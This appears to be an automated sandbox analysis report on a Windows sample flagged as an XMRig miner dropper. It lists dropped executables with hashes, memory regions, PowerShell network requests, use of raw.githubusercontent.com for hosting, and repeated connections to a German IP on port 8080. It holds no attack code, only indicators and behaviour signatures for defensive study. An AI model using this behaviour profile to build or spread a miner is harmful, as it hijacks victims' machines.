C:\Windows\System\CQiaSLN.exe

C:\Windows\System\cArTbVN.exe

C:\Windows\System\cArTbVN.exe

C:\Windows\System\SGZvXeh.exe

C:\Windows\System\SGZvXeh.exe

C:\Windows\System\DTnYyIy.exe

C:\Windows\System\DTnYyIy.exe

C:\Windows\System\FwkIyOH.exe

C:\Windows\System\FwkIyOH.exe

C:\Windows\System\tvgtYUa.exe

C:\Windows\System\tvgtYUa.exe

C:\Windows\System\nSgkNgV.exe

C:\Windows\System\nSgkNgV.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2228-0-0x000000013F580000-0x000000013F972000-memory.dmp

memory/2228-1-0x0000000000190000-0x00000000001A0000-memory.dmp

\Windows\system\QMiHDMJ.exe

MD5 83e09d9246098f43202cb960010fd6f7
SHA1 174b48552958cbef7161885401d0fcd08e13caf5
SHA256 d59ae49b08f4509803e9fc0ed64534b1868c2513ad8b685da9f66199a509e3c7
SHA512 efcf1a5cae1378d2cddb04a0612d1fd5ec4fe44af0981d16968b6d8edd9830de0c3ae9b7ea153512a1e8f3280b229380446314412b03de8d49e0e4e2845b70f4

C:\Windows\system\JFKYSSd.exe

MD5 f3fac26c5372d49359856004dd0e78cb
SHA1 dbfe8fc0362075b0b9997c7cde77c82decdd6905
SHA256 18db1bc427ee2363ae2194ca7e87c91a557617aba90875c4e2602bc556aa6ea2
SHA512 3fc7ee38ca7b9d894e994990d41b417f025dd9092312bc9a49809f13f21e758902f18d6797c77ff4385cd1167fd23b773c5904f2aebcd11bf381566cf1a86be6

memory/3040-8-0x000000013F8B0000-0x000000013FCA2000-memory.dmp

memory/3024-18-0x000007FEF5DBE000-0x000007FEF5DBF000-memory.dmp

C:\Windows\system\VJdRBjd.exe

MD5 525cfaf7a8ed055929229ff62ad5f1de
SHA1 b71eaaf4de48110943a739e034f4696a35632e3e
SHA256 549ff82096822bc62917a9b0fe42703303ec17499998985b5defe577ffbe1a95
SHA512 f71dde4fc5372b24a09d5b01256aa584b469d359a94a294ec9ba3f67f2728c0c5fbd3d38259dfe615a89fc29d4e2c24ba57193b228ed342e312720589c5bff38

C:\Windows\system\fTeHfCd.exe

MD5 2bcbde38b43f9797e8154997ce47c821
SHA1 306a1b554b29d285c6cab8176206260624d6935e
SHA256 d8e25fcacaf393c655f7278ab25da093ff8b090859c239ecb9c7c008442c0570
SHA512 a2911dfb0a142194eb22457982a635bc656542ddd176488890664a6e23499452ceb3cd30a1b9e82adb986327f6b867e95d09d0894c823156bbffff4f6438d2a5

\Windows\system\KmaQKDB.exe

MD5 b97fee3353a9c3284793215b47ef28e6
SHA1 c69f34dd6d5274d344677e92dec5c07f15d014b9
SHA256 d7b39794e9b244bbecfb2115024950491110cd8385d4a6742c13e3bbf02d8c0e
SHA512 9e3f8940a4e0358a37f3716f81385d0d30babe7c1a354fff35cd2814f3a5f429f88cddb29877928fd311245d80adb40b60494757f5e3c6a93fd645a718d90295

memory/2228-6-0x0000000003040000-0x0000000003432000-memory.dmp

memory/3024-32-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

\Windows\system\QrgnCDG.exe

MD5 91233c848ad50cf18aba8ac39a3e2ba3
SHA1 45c79f30ca29ccf24fa32311bbba9cbb4f50f19f
SHA256 2accee4ba18bea69a250ef7c52826830a32b66145f595a9f005f3073082585d6
SHA512 9aa1173d954c655bdd4a1ba3507d12bdcc2027c8ea058c10eb55a72c2d97ca8fc85e3b3461369c45868b178a26e210dc58f007929ed40a831d133f178772f38b

memory/3024-31-0x000000001B6A0000-0x000000001B982000-memory.dmp

C:\Windows\system\YcWNsIU.exe

MD5 53460b001fd669203a2a93ce0b872d06
SHA1 8fba84eebb7dee8ee49a1c06745ba309b35cdfe2
SHA256 83ad21e6c9c1f25a88640491e694ea58341edb5ba84a09ea8cc74fd88158ec2a
SHA512 df6e6cfbb45ac021582fb14ed616985b1d0a8e0f6a7d4a5cd9c30627619610c7a4ab54c62ae1a7998f08733794fc27401ce4c9bafef08a4b3929dfe71300c526

C:\Windows\system\JYOFxGs.exe

MD5 73b73cd1837a74dbe597270e5d0093d5
SHA1 a430f9cc763b372712d523587795b6379ec82afb
SHA256 1493a713af4601390caa515416027d76851a72e7d7330f52f6250bb355be085e
SHA512 b46ffc90caa0166931a4dc70a000fb0e84fc748e58d44864a82ed4d6e1e122532032c32f077d684a60fc90f8abb7dcada5838767124ebe6cf171a4531c15a59e

C:\Windows\system\jPMiWAD.exe

MD5 99742bc9162b3e04730b17cb71fb5bbf
SHA1 eb97367a6d1c812971804dc9551ea6bb53f35583
SHA256 fc2eaedbe78db379e0b12594a0cb9adfdc381596d07681ac81ead5087a88b83d
SHA512 1422e4c1308478103641134302cf293b29a819cda7d61b8152a85332b5b725b9c4bbb47a4e0b1c177409b5663f926bdc40db691b4482862d20bf0aeaa00f7ee9

\Windows\system\GreBktc.exe

MD5 0eb9ca94d1f57cec08607b4128366d75
SHA1 bd6f0b0da9d96cf455aa4ce1f84a273c98da346e
SHA256 1be13503aaca737c3a8dffb461eed4cfab6e870ad8be5d97d8aaf36ae78709ed
SHA512 daea685be6ddc9b9b41bc3d0c22be7b203ece443ce04a4b27274f8bef830a586aa3ce7e777d2ed603dfdbfb46e055e85e82963550cce15ee264324bf544c0d66

C:\Windows\system\Hbpsrjt.exe

MD5 1bc5091730360897744ac23bbb50f526
SHA1 439cb1deb1823e5a18e83fff231415d3b446e793
SHA256 96976a11ca6e84a2fd2f7919242838910768522e6b7c8b6cf762391c1edb5bf4
SHA512 2e2569d63649ee7e8afaf9caa3750e9854005cca4dd0b44dfbc2695cc897057d81094e362f8ca267fa876f8a4c4b388af9be33f49daf625b6a879ca38221ef6b

C:\Windows\system\BwbzRYy.exe

MD5 7dcacf236e98b386a759593aacb7ad8e
SHA1 93a36af6608b0c1f9e6955c76719c0d2f3dde3b4
SHA256 40839a4700c602cad09ffebbccd224b8ffda34f9642f2627e0a4200476dde547
SHA512 8bc7702da8fa63ac5d133a38fbfa06ecb74d0849344e4f3121b9427af63af3082d31cee3ea5e91ce75a49ce539c9e19fd7cecb3829c7845cec472f944bf3f259

C:\Windows\system\hxjewgT.exe

MD5 cd80c6fc2262d0e3723bd3c5521c77ae
SHA1 652c40e047372c5ad8258cd6057c684df39bf2c7
SHA256 65325b2182d90c3394cc6a525f6e6b394b1c89ec9bb1aa858109a1f205f99928
SHA512 1013eb384416e46186cfbaf2e77cf9efba60d1964ce8d7b297ba67f6dd8a6e7db5479f729b23a6f7c2385b57a1be892360060b3086fca207df4bbb9d948ec451

\Windows\system\SWbHHsq.exe

MD5 d2e8d46a7af6b5c33291e287243724d2
SHA1 2cb2925585f5da59fd94909e4a3d423196b1ee6a
SHA256 7bc0377ccecd5d1643a340cee6930bf2b0001d2d161a6e7e285ae5ec6ba60e2a
SHA512 977fe37981edf3662a5d80e88d71c0a0d32ef57a078c0211df2502a14df3c6a0fc4f2f9ad50952981d5992b51415bae573a18445dbfaf099f9be5b92ed072ffc

memory/2228-176-0x000000013FAD0000-0x000000013FEC2000-memory.dmp

C:\Windows\system\epvlwLy.exe

MD5 48f9fa2423e2077ae07fff071b59ab7e
SHA1 7af386bce4c740473932fa50efc8b5749ceaa5d7
SHA256 45440df533d0f252254fc6fbd294040077b876fb7434d8080ff261ebf37be721
SHA512 655ea5325d24e38cf5417a80e313c854b81173ef190da5a27537b867ed71b98a7d66869a309ad4abccf2092c4f8b7a044d9d25d4b2f574f6de827a6b83af447b

memory/3024-310-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

C:\Windows\system\WhdzYPE.exe

MD5 1c7dd99a75dd2798032e818612bc14f6
SHA1 286b9d66dc461453b81b1919101cfd14e6b9b705
SHA256 a548d8282edfc18e9271d8cb0af5e64ec4805a12c0293beab187c3f3851a4eab
SHA512 d2d99cc2c68442324e21e9e9659b6deaef07b2333cbc971918f5372e57eeef0d84bd86bd050beac914335c44466a6f4f7879c0fd17a589dbe4008a8b63fac0f9

\Windows\system\tmINzjj.exe

MD5 e5f40135b2bf66be32ceb39d297f54e3
SHA1 0d229b93ffe77b1d3b3eb96a3b38c173dcbc760c
SHA256 fc60986def090123fb5845b80eb2671ec12babf6d6eaeb44427bbf35f886b47d
SHA512 c5a7766dcdcaeacb814985b12a597ef2dd19c23e1461ac0d0102b2adbdbf2f9b1ce88540551614e5ffcbd89dc4c9799e7294eb73f8d4cdc1609fe005a4fa60ec

\Windows\system\ARAGKtL.exe

MD5 91c0831430f0c75ae0b9ebb856ed706e
SHA1 c4e450119c161d25dee0d908a0e01ed4fa926b04
SHA256 524be9796ba6ceb32c1b64bdb091f1293f9f05cca211cdd7022e57dff07d5aa8
SHA512 28ce5ce6cb43f841c818fd94f6ddb4fa096a4ab0b907aa3ef7eaa5a37d85d7eba3c5933e2cd960d8570f1dd6c8fa0ebe9384f2eafd19b1ffdb85978835f33ffa

C:\Windows\system\wZMYHvg.exe

MD5 c1916f5aa7fc2e86ea3472e86790d027
SHA1 1adb447c6d5822ccce9a318b1d67f613ecd330c9
SHA256 4f207e8201236f15d7d90d0c8e09c753706151756a93e39b14ed4f7fe6e1e649
SHA512 311237a8e07231c688eb33e0ad8a7a8c137b52cdf8ce4a1c576ca3c989679db9a8847a8eed0079546e55c8fd8c641ef5b8a505980e1f476e18238c31867d6d0e

\Windows\system\osXYWjB.exe

MD5 79af4f6f664ccf338079d9236e395953
SHA1 4cf075cfb8bf165f450ade6fc52b1f17dfb750af
SHA256 d4eb26ba24ab913f6a5f7d07b392248003dc5c26ab5bbc296c6d580bc3314c25
SHA512 3f5116368e1bb5c283c11d8f09fde8c8fe5279678faa64095d761a333dd7346ba1691d3f066261149a3395a1f0933cc040d6dd07a8c44ea92e075bce9a8aef11

\Windows\system\IRgKnwj.exe

MD5 a8f9a4dad2587abe43e2d2f4bab16ca1
SHA1 24588138a4d2b52404f230346670ae8c62b0919d
SHA256 4cffc7587a68de0c81313f4e32eb47a4b4adfdd216452b888a905203da9704de
SHA512 c58afcb7914cb421ea5fad390c127d0a70d5a824427915d96ec4c3a31a1a350d19ef0a51dc30bae7af075b0db2710b5126f79d45e7814ebee9035be7d0f45449

C:\Windows\system\eZxMemu.exe

MD5 0fc96a97e2c97d0b2ed4a1a71b909751
SHA1 2a9ab7e140d5f196b660fd1eff560a6023caee4b
SHA256 ec954b045b2e3e1209252db5ab92d9c1b203d9d5472962b1e70feac263b9f29b
SHA512 c60bafbe75c5483d9dd99b666021dfaa5708eac0bd054a7b726e5530d2db820cc3ea6bca04c133bdac600671887cee6216e13a12c65ca8437f1a83c116245711

C:\Windows\system\eQmdmYx.exe

MD5 f4d11b14d5545663913a0ae0a11ce5cd
SHA1 5cda2142b6113d2a992c3b575eab2425fe18a0da
SHA256 b712575368b76ccf5185b753ae8a21125d6675db11b7c2244f0b167c9ddeef05
SHA512 4c7b46bc4125b775628c1df72d0e90db8eada6ada26ff63904e37332146830db85876dc12ddfcddcc10b3dcfabcb282c999cd91c3fee8ec95598d95cf395ebe6

\Windows\system\AkSWsGt.exe

MD5 54fa818b154184f15c844b9e821a317c
SHA1 3d680197cdcba13d31a1484616160dc8af6f16e2
SHA256 b03d6721ddecbf472a0f407be8d2a25fdb080716aeb635a20b601829bddefd53
SHA512 a3186b9991f029a333970df47c634282df8321ffa4f55667411d020166f177af9a117017418349a070f914459482960b87c8333a35ce86fd6aaf6b4d8e618949

memory/2228-135-0x000000013F050000-0x000000013F442000-memory.dmp

\Windows\system\UgZzPLf.exe

MD5 fed58a49d9966f8ae7d81496fd8fd150
SHA1 272b0cb5a703306e42df968ac37efa7f03189252
SHA256 6d8f1c89ec8463347137de8a78f7401f9484c9f1f3f203b7a0fddbfbb5f4030c
SHA512 da74488510d1214e409bcf2b2d3d318192fcba2e11b8bbb88b10b11b354b8439486180da0453647d4926dc3f14833bb88bbfe5877d9e9cb2fb418c9a655295ea

C:\Windows\system\qZdXNqe.exe

MD5 a4854f7c6e8ffbd481f81399202fd6a8
SHA1 0c7fb14bc6475614986288a3b56a7f6abbff14ba
SHA256 4ca596cfba25ab5c7756b9c70ddfab5d282f6568afa27c4d186742eea27a3f59
SHA512 cc63abd53a6b813e79579724b7955f1ee64caeab97f286e8b8657a9cce84b26dc91f3d12541bba33765a4d70e04c2d4493c4c7f613537003f41c489191eeadb7

\Windows\system\shnvFAG.exe

MD5 2f5b7d0f886a4747ef98061f722f4ae5
SHA1 98f1ba5763d4036a0500d94ab29f8930e57cad98
SHA256 bc46d29ae813f940a2a484cb30a2a5c3e7900f2f7b6129702c8d15cc0ae3bc68
SHA512 0d22b61ede90f1242df9be3687d85e526f84c35294f798187f94afb4924effa69c62d0261fa7f288d16d60c6bfc7e1b29aea3fd7f2c6c0550f52eece06b4eb70

memory/2228-118-0x000000013FD50000-0x0000000140142000-memory.dmp

\Windows\system\CewlPdY.exe

MD5 3e3e4d9eac67dda761511547d96033a9
SHA1 2fd38a5a37fb22911060fc74e2a5faa178c1e19c
SHA256 19afc937d8562585991b7d729339246a8d74d0d22b9d998753ba1e6637e42721
SHA512 2e32040f2f199743279be51f847ddd3c6423fa42b85a935e8cfd4f5de38fa6300364bf62c3b6f3329a8022151a587fce495cfc7544a25a2ce5da2e48fc00836c

\Windows\system\PMSdxbc.exe

MD5 ff8307235bf2e0ad0dc4745e95def626
SHA1 8fe7da68fcfd5cbf842c95d9a59eac23d11d5ac4
SHA256 e83b713c9c9ba9c7241fae998e1e1e8bdf1a9c9369157c0ea20f43fc8d353643
SHA512 5a2585f3e936d9ded0ca6a8095e08bd68b55dff91e8c468aa339e32f89459ac5e9844724d3a0ac68837571bb210489346a2277787d515264e60cb62065bfd8ae

C:\Windows\system\wLaSZGE.exe

MD5 f3dfe80fa7eb9e6040410d598eec3a12
SHA1 44a43526ac7628bd017c542877e5f920fd6fcee8
SHA256 63408d9914b6c50e7d4d8116c402cb10b9c74911a377518baa4bd0fed8ee1a18
SHA512 4b669c30d3554312314d57bfd0918069d3840c312cb2f98289a44aa6ec732f3c4d73d47377426ecb95a64ee3161d3f4096212fc5a3b3791efca6863c84a5f1a0

\Windows\system\nyyneJx.exe

MD5 7fb6fd25ad2846ead2805174066c7ec5
SHA1 18b3a0f72da89e8a5717472aaf66fbea3a270126
SHA256 ce707801bce8f714fb408ac5f36db22f5c29583269ef60647a72892ce1c0ecf7
SHA512 eaed400226d7abc886bba31e422a3098694482e32f2abbf7fa87e3c0b87152ba9708aec5e391c7e45119498ecb86638868bba62272157114c23a8eb46677963e

memory/2600-91-0x000000013F0A0000-0x000000013F492000-memory.dmp

memory/2760-90-0x000000013FF80000-0x0000000140372000-memory.dmp

\Windows\system\dEZkFrw.exe

MD5 511cfc054271517a1488e5c7492e416d
SHA1 1288ecc8b9e8903f9cd61fb5c92ede10dfcc8f94
SHA256 dac55fe3f528b92b46530475bb27ff449e5c2a8cfd8413f4cf95984f5b6b3649
SHA512 9ca1140f8f6681e743706006fd69d0e1e27cf0c0269229da93a6e0714ff60539b99642c304cdd64f64688624aea17de83f73645aded95ef79a0383442132b4ca

C:\Windows\system\hhdxiBX.exe

MD5 be675066e36cc6b7295c073841a9c869
SHA1 c6f78736c2759e1d15239ec5eefa3363793fc65c
SHA256 42a6445507953148cb42c09b2c9600dc301c9e33a444429b955bb2cbddd8ea75
SHA512 7ff079a0d6b4d2036d350742c99687b9bd1caba768b122f3366a47c2d059d73b1ddd34c8568da8925e0f39b6f1309c804a0a0c8e2dce8af6eb57877a95610398

memory/2228-169-0x0000000003040000-0x0000000003432000-memory.dmp

memory/1744-163-0x000000013FDC0000-0x00000001401B2000-memory.dmp

memory/2264-154-0x000000013FD50000-0x0000000140142000-memory.dmp

memory/2228-147-0x000000013FFB0000-0x00000001403A2000-memory.dmp

memory/2496-130-0x000000013F550000-0x000000013F942000-memory.dmp

C:\Windows\system\jNlJgvG.exe

MD5 d119f8ebd0e1b3e6ef83496f9ce01846
SHA1 2be84e5f7ed253a944874f66402ef6e74b5a2fe3
SHA256 1ac306f767ed103bb13d2af89fd4f3d006669a477f38d13f2ac0c3fff4bcbfbe
SHA512 9a30c815b39ba1574123f3267ff00ebc12692c635c1603d6e8f1a208a9fd4a858380a72f9809e030cb16d70d66843126086f9e90b3ec3f611a6387b96fa6b4ac

memory/2680-107-0x000000013F140000-0x000000013F532000-memory.dmp

memory/2228-99-0x000000013F140000-0x000000013F532000-memory.dmp

C:\Windows\system\mqWpNqC.exe

MD5 009896dc96bee785db193c04fa5a1e6b
SHA1 cce7ffb508ba2a52a964bd861354e0ac62bdb209
SHA256 dfdbc0b5d43ecd3e8dd43f3f6e4b0989964b8da165991656c2d2aa7470685a9a
SHA512 56f67d842e4c51c746996efdfc57807530fbcf61bf09429b5bfe2264cfbc61f07000e94d8cb44c815eec065fa53a30df4ea6691277dfa2f696c4ae69204b1145

memory/3024-69-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

memory/2228-88-0x000000013F0A0000-0x000000013F492000-memory.dmp

memory/3024-86-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

memory/2228-85-0x000000013FF80000-0x0000000140372000-memory.dmp

memory/2144-84-0x000000013F240000-0x000000013F632000-memory.dmp

C:\Windows\system\oUYVDDL.exe

MD5 7697daacc1984cac7d1496d72b4b3f90
SHA1 d80fdca53665fd496640541197a8aa25fedb8396
SHA256 4e6b24e054d3cbd544b07b9b39869b505d4749e9ff116a5371e2b0ab95a96c05
SHA512 e158d16451053a3097bb59e9f59c1efaff110c80cb209922aae5d1b87be18d84166b16afb27f958f61497b4a99e31fa1e86b9c8b3554335bd9cf83d7ce2ae180

memory/2228-83-0x0000000003040000-0x0000000003432000-memory.dmp

memory/2620-82-0x000000013F270000-0x000000013F662000-memory.dmp

C:\Windows\system\cymHrrf.exe

MD5 681388d48dc803d4c790a5136460342f
SHA1 a17eebad18f5094b4f75bab0bb387b6ef2df8c21
SHA256 ce1da861c216e7dfb54e021189ee955a5d59670b1f58a1547fc1ea0f99bd0ddf
SHA512 c2382823f20d589c07f5465485edf17cbb6b560d606431c665c756aed76eeba63d872b4d1e0d109599cd53ffcc124a2d3c98ac746f6d7c10ee3abf0698d2398e

memory/2676-75-0x000000013F630000-0x000000013FA22000-memory.dmp

C:\Windows\system\GRikwIy.exe

MD5 40339df906a59e9628ec0c88f56f8ce7
SHA1 6726b7b437c1565f08c57f56c7936f974f34f156
SHA256 eba2aeea325e9f321cf049ed3b1ce7dd2cc58ffbe6fe74508f4f129df7ce370b
SHA512 466a9595338d9a6f86f8f7c4fa41266870c0273cb0d93d070729c327d5066f67b932435295ced54e2615da0410203b79158e25314f4493cb35d57c6743dae27b

memory/3024-41-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

memory/2228-47-0x0000000003040000-0x0000000003432000-memory.dmp

C:\Windows\system\nntykDK.exe

MD5 30a9dfceb37577cb23b97b50ee0ca790
SHA1 b56360a546aafbfa7ce003cd05916a7ab7239259
SHA256 44dda0d0cfe87b066fcb3ae3e2b0cbc86f86ca0fdd14c7ce736c7a63fedce1f4
SHA512 f1ae1743e6029aabc9e7387b476be46b30f000874bca6e0907b605cfb329a40abfc7d4eb3d891027c469be0356b370267e0531be7c50ab8183a5aad8ce1cbe57

memory/2496-5046-0x000000013F550000-0x000000013F942000-memory.dmp

memory/2144-5047-0x000000013F240000-0x000000013F632000-memory.dmp

memory/2600-5048-0x000000013F0A0000-0x000000013F492000-memory.dmp

memory/2680-5049-0x000000013F140000-0x000000013F532000-memory.dmp

memory/1744-5053-0x000000013FDC0000-0x00000001401B2000-memory.dmp

memory/2264-5056-0x000000013FD50000-0x0000000140142000-memory.dmp

memory/2760-5085-0x000000013FF80000-0x0000000140372000-memory.dmp

memory/2620-5089-0x000000013F270000-0x000000013F662000-memory.dmp

memory/2228-10384-0x000000013F580000-0x000000013F972000-memory.dmp

memory/2228-10588-0x0000000003520000-0x0000000003912000-memory.dmp

memory/2228-10602-0x000000013FAD0000-0x000000013FEC2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 18:42

Reported

2024-05-22 18:45

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\MkWwWWu.exe N/A
N/A N/A C:\Windows\System\sZznUib.exe N/A
N/A N/A C:\Windows\System\BVwPByv.exe N/A
N/A N/A C:\Windows\System\XQShQqQ.exe N/A
N/A N/A C:\Windows\System\XkxDRyE.exe N/A
N/A N/A C:\Windows\System\RJpfNeR.exe N/A
N/A N/A C:\Windows\System\xyPPoCI.exe N/A
N/A N/A C:\Windows\System\DWvsypp.exe N/A
N/A N/A C:\Windows\System\LlYuGQr.exe N/A
N/A N/A C:\Windows\System\oOyUCRl.exe N/A
N/A N/A C:\Windows\System\yEwepFp.exe N/A
N/A N/A C:\Windows\System\PpEHevo.exe N/A
N/A N/A C:\Windows\System\iURvfUJ.exe N/A
N/A N/A C:\Windows\System\vZPYhME.exe N/A
N/A N/A C:\Windows\System\wUtbeMY.exe N/A
N/A N/A C:\Windows\System\UvkHGyq.exe N/A
N/A N/A C:\Windows\System\NFrAZex.exe N/A
N/A N/A C:\Windows\System\JIABtjC.exe N/A
N/A N/A C:\Windows\System\FWnHglA.exe N/A
N/A N/A C:\Windows\System\VDipaHs.exe N/A
N/A N/A C:\Windows\System\wFiLZDg.exe N/A
N/A N/A C:\Windows\System\RJhZjyd.exe N/A
N/A N/A C:\Windows\System\DZbxwbK.exe N/A
N/A N/A C:\Windows\System\DYchtCr.exe N/A
N/A N/A C:\Windows\System\SBsmluc.exe N/A
N/A N/A C:\Windows\System\xjRwRst.exe N/A
N/A N/A C:\Windows\System\ZXuIcQi.exe N/A
N/A N/A C:\Windows\System\VDcKDtX.exe N/A
N/A N/A C:\Windows\System\iUgOFqw.exe N/A
N/A N/A C:\Windows\System\xvCXvgF.exe N/A
N/A N/A C:\Windows\System\JUVJTSc.exe N/A
N/A N/A C:\Windows\System\cCYSZvE.exe N/A
N/A N/A C:\Windows\System\RAsBsbW.exe N/A
N/A N/A C:\Windows\System\uuaVkEP.exe N/A
N/A N/A C:\Windows\System\AwyNlbq.exe N/A
N/A N/A C:\Windows\System\GlJytUh.exe N/A
N/A N/A C:\Windows\System\jIprdUB.exe N/A
N/A N/A C:\Windows\System\amUbDqO.exe N/A
N/A N/A C:\Windows\System\jbNvNgZ.exe N/A
N/A N/A C:\Windows\System\RRvafBb.exe N/A
N/A N/A C:\Windows\System\BrlKFzI.exe N/A
N/A N/A C:\Windows\System\CfKWllz.exe N/A
N/A N/A C:\Windows\System\bXhEBai.exe N/A
N/A N/A C:\Windows\System\RTfAuxZ.exe N/A
N/A N/A C:\Windows\System\anmNHOV.exe N/A
N/A N/A C:\Windows\System\vHsnaIX.exe N/A
N/A N/A C:\Windows\System\elJBdCf.exe N/A
N/A N/A C:\Windows\System\jfIKHPK.exe N/A
N/A N/A C:\Windows\System\pJmXdAX.exe N/A
N/A N/A C:\Windows\System\QhlyFzn.exe N/A
N/A N/A C:\Windows\System\KrPsRIC.exe N/A
N/A N/A C:\Windows\System\EMIrBGs.exe N/A
N/A N/A C:\Windows\System\sCWyikM.exe N/A
N/A N/A C:\Windows\System\BRWpmmA.exe N/A
N/A N/A C:\Windows\System\XNhBZmz.exe N/A
N/A N/A C:\Windows\System\mfBpSLL.exe N/A
N/A N/A C:\Windows\System\Itogmwb.exe N/A
N/A N/A C:\Windows\System\wzwTsNd.exe N/A
N/A N/A C:\Windows\System\NBprgBx.exe N/A
N/A N/A C:\Windows\System\DQpehqu.exe N/A
N/A N/A C:\Windows\System\XPOXUaF.exe N/A
N/A N/A C:\Windows\System\CRXnMyY.exe N/A
N/A N/A C:\Windows\System\UawLkBE.exe N/A
N/A N/A C:\Windows\System\PEmDwtF.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\vMNkhlS.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\RAsBsbW.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\BRWpmmA.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\LXxicUl.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\xgImKpM.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\XrOopXP.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\eSAZmsw.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\VDedIId.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\pgoFsxm.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\eaeIKiz.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\MyJPHcA.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\UBEvQah.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
